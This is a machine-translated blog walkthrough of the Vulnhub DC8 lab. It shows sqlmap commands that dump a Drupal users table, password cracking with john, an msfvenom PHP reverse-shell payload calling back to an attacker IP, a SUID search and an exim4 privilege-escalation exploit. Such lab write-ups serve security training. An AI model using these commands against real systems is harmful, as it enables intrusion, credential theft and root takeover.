当前位置:网站首页>Vulnhub's DC8
Vulnhub's DC8
2022-06-26 21:54:00 【Tianxia (Tianyan Master)】
Dear friends , But look at the master directly
https://blog.csdn.net/weixin_44288604/article/details/122944302
Personal writing is very rough
DC8 Its own difficulty is low , You can easily obtain the target permission , General idea
The host found , Port scanning —— Exploit service vulnerabilities —— Get background permissions —— Upload shell—— Raise the right
The host found , Port scanning , Service detection 

Total open 2 Ports ,80 and 22 port ,80 The services with open ports are drupal 7, Open the interface for detection , Here use burpsuit union xray To test
burpsuit Of user option Set your own idle agent in the operation bar , function xray that will do , As shown in the figure below
Use here bp Test with your own browser , Then click on the interface , Click on each function node
Click to http://192.168.43.142/?nid=3 In this interface ,xray The presence of sql Inject , Go straight up sqlmap
Two databases were found ,d7db,information_schema, Choose the first one here d7db, View table name
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
Choose from a variety of tables users surface , Direct download
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
Two users were found ,admin and john, But the password is the encrypted data , Try brute force cracking , Make these two ciphertexts into a dictionary , Use john To crack violently , Burst out of it john The password for turtle, Log in backstage , View to upload shell The location of , It is recommended to use Google browser , Don't ask , Ask is to be able to right-click translation 
In this interface , You can define the interface after entering the form , Here the msf Generate php The Trojan horse bounced , It has been generated , No display
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
Open the file , Copy the file to the location shown above , choice PHP code, And save , Then submit the data in recheck format in the corresponding form , You can accept the session
python Interactive shell, Find yes sudo Permission to execute the file
find / -perm -u=s -type f 2>/dev/null
found exim4 by sudo jurisdiction , View version , Find corresponding exp
exp Dafa , Download the second one here , Then copy it to the attacker , Use python Turn on http service , The target machine downloads and runs

get root jurisdiction
边栏推荐
- Comprehensive evaluation of online collaboration documents: note, flowus, WOLAI, Feishu, YuQue, Microsoft office, Google Docs, Jinshan docs, Tencent docs, graphite docs, Dropbox paper, nutcloud docs,
- Centos7编译安装Redis
- Usage of MGrid in numpy
- 【数学建模】基于matlab GUI随机节点的生成树【含Matlab源码 1919期】
- LabVIEW Arduino TCP/IP远程智能家居系统(项目篇—5)
- Module 5 operation
- YuMinHong: New Oriental does not have a reversal of falling and turning over, destroying and rising again
- Student information management system based on SSH Framework
- How to create an OData service with the graphical modeler on the sap BTP platform
- Implementation of collaborative filtering evolution version neuralcf and tensorflow2
猜你喜欢

龙芯中科科创板上市:市值357亿 成国产CPU第一股
![leetcode:1567. 乘积为正数的最长子数组长度【dp[i]表示以i结尾的最大长度】](/img/a4/c5c31de7a0a3b34a188bfec0b5d184.png)
leetcode:1567. 乘积为正数的最长子数组长度【dp[i]表示以i结尾的最大长度】

Configure redis master-slave and sentinel sentinel in the centos7 environment (solve the problem that the sentinel does not switch when the master hangs up in the ECS)

leetcode:6107. 不同骰子序列的数目【dp六个状态 + dfs记忆化】

茂莱光学科创板上市:拟募资4亿 范一与范浩兄弟为实控人

亿级月活全民K歌Feed业务在腾讯云MongoDB中的应用及优化实践

leetcode:6103. 从树中删除边的最小分数【dfs + 联通分量 + 子图的值记录】
![[LeetCode]-链表-2](/img/f7/9d4b01285fd6f7fa9f3431985111b0.png)
[LeetCode]-链表-2

Godson China Science and technology innovation board is listed: the market value is 35.7 billion yuan, becoming the first share of domestic CPU

y48.第三章 Kubernetes从入门到精通 -- Pod的状态和探针(二一)
随机推荐
简析攻防演练中蓝队的自查内容
curl: (35) LibreSSL SSL_ connect: SSL_ ERROR_ SYSCALL in connection
numpy中mgrid的用法
【图像处理基础】基于matlab GUI图像曲线调整系统【含Matlab源码 1923期】
MacOS環境下使用HomeBrew安裝[email protected]
Solution of valuenotifier < list < t > > monitoring problem in fluent
leetcode:141. Circular linked list [hash table + speed pointer]
2022年,中轻度游戏出海路在何方?
YuMinHong: New Oriental does not have a reversal of falling and turning over, destroying and rising again
MATLAB与Mysql数据库连接并数据交换(基于ODBC)
leetcode:6103. Delete the minimum score of the edge from the tree [DFS + connected component + value record of the subgraph]
Is this a bug? Whether the randomly filled letters can be closed
亿级月活全民K歌Feed业务在腾讯云MongoDB中的应用及优化实践
[bug feedback] the problem of message sending time of webim online chat system
How SAP Spartacus default routing configuration works
LabVIEW Arduino TCP/IP远程智能家居系统(项目篇—5)
股票炒股注册开户有没有什么风险?安全吗?
龙芯中科科创板上市:市值357亿 成国产CPU第一股
Operator介绍
证券注册开户有没有什么风险?安全吗?